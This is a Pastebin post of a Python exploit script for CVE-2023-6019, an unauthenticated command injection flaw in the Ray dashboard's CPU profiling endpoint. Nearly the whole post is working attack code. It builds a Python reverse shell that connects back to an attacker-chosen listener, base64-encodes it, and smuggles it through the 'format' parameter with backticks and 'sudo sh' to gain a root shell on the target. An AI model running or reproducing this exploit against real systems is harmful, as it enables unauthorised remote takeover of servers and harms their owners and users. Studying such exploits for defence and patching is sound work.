FlyFar

Ray OS v2.6.3 - Command Injection RCE (Unauthorized) - CVE-2023-6019

Apr 12th, 2024
79
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.82 KB | Cybersecurity | 0 0
  1. # Exploit Title: Ray OS v2.6.3 - Command Injection RCE(Unauthorized)
  2. # Description:
  3. #  The Ray Project dashboard contains a CPU profiling page, and the format parameter is
  4. #  not validated before being inserted into a system command executed in a shell, allowing
  5. #  for arbitrary command execution. If the system is configured to allow passwordless sudo
  6. #  (a setup some Ray configurations require) this will result in a root shell being returned
  7. #  to the user. If not configured, a user level shell will be returned
  8. # Version: <= 2.6.3
  9. # Date: 2024-4-10
  10. # Exploit Author: Fire_Wolf
  11. # Tested on: Ubuntu 20.04.6 LTS
  12. # Vendor Homepage: https://www.ray.io/
  13. # Software Link: https://github.com/ray-project/ray
  14. # CVE: CVE-2023-6019
  15. # Refer: https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe
  16. # ==========================================================================================
  17.  
  18. # !usr/bin/python3
  19. # coding=utf-8
  20. import base64
  21. import argparse
  22. import requests
  23. import urllib3
  24.  
  25. proxies = {"http": "127.0.0.1:8080"}
  26. headers = {
  27.     "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
  28. }
  29.  
  30.  
  31. def check_url(target, port):
  32.     target_url = target + ":" + port
  33.     https = 0
  34.     if 'http' not in target:
  35.         try:
  36.             urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
  37.             test_url = 'http://' + target_url
  38.             response = requests.get(url=test_url, headers=headers, verify=False, timeout=3)
  39.             if response.status_code != 200:
  40.                 is_https = 0
  41.                 return is_https
  42.         except Exception as e:
  43.             print("ERROR! The Exception is:" + format(e))
  44.     if https == 1:
  45.         return "https://" + target_url
  46.     else:
  47.         return "http://" + target_url
  48.  
  49.  
  50. def exp(target,ip,lhost, lport):
  51.     payload = 'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' + lhost + '",' + lport + '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\''
  52.     print("[*]Payload is: " + payload)
  53.     b64_payload = base64.b64encode(payload.encode())
  54.     print("[*]Base64 encoding payload is: " + b64_payload.decode())
  55.     exp_url = target + '/worker/cpu_profile?pid=3354&ip=' + str(ip) + '&duration=5&native=0&format=`echo ' + b64_payload.decode() + ' |base64$IFS-d|sudo%20sh`'
  56.     # response = requests.get(url=exp_url, headers=headers, verify=False, timeout=3, prxoy=proxiess)
  57.     print(exp_url)
  58.     urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
  59.     response = requests.get(url=exp_url, headers=headers, verify=False)
  60.     if response.status_code == 200:
  61.         print("[-]ERROR: Exploit Failed,please check the payload.")
  62.     else:
  63.         print("[+]Exploit is finished,please check your machine!")
  64.  
  65.  
  66. if __name__ == '__main__':
  67.     parser = argparse.ArgumentParser(
  68.         description='''
  69.         ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀
  70.        ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
  71.        ⡠⠄⡄⡄⡠⡀⣀⡀⢒⠄⡔⡄⢒⠄⢒⠄⣀⡀⣖⡂⡔⡄⢴⠄⣖⡆⠄⠄⡤⡀⡄⡄
  72.        ⠑⠂⠘⠄⠙⠂⠄⠄⠓⠂⠑⠁⠓⠂⠒⠁⠄⠄⠓⠃⠑⠁⠚⠂⠒⠃⠐⠄⠗⠁⠬⠃
  73.        
  74.        
  75.        
  76.                            ⢰⣱⢠⢠⠠⡦⢸⢄⢀⢄⢠⡠⠄⠄⢸⠍⠠⡅⢠⡠⢀⢄⠄⠄⢸⣸⢀⢄⠈⡇⠠⡯⠄
  77.                            ⠘⠘⠈⠚⠄⠓⠘⠘⠈⠊⠘⠄⠄⠁⠘⠄⠐⠓⠘⠄⠈⠓⠠⠤⠘⠙⠈⠊⠐⠓⠄⠃⠄
  78.        ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀
  79.        ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
  80.        ''',
  81.         formatter_class=argparse.RawDescriptionHelpFormatter,
  82.     )
  83.     parser.add_argument('-t', '--target', type=str, required=True, help='tart ip')
  84.     parser.add_argument('-p', '--port', type=str, default=80, required=False, help='tart host port')
  85.     parser.add_argument('-L', '--lhost', type=str, required=True, help='listening host ip')
  86.     parser.add_argument('-P', '--lport', type=str, default=80, required=False, help='listening port')
  87.     args = parser.parse_args()
  88.     # target = args.target
  89.     ip = args.target
  90.     # port = args.port
  91.     # lhost = args.lhost
  92.     # lport = args.lport
  93.     targeturl = check_url(args.target, args.port)
  94.     print(targeturl)
  95.     print("[*] Checking in url: " + targeturl)
  96.     exp(targeturl, ip, args.lhost, args.lport)
  97.            
Add Comment
Please, Sign In to add comment